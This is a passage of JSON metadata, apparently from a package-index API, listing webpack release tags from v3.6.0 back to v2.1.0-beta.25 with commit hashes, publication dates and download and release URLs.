ame":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/t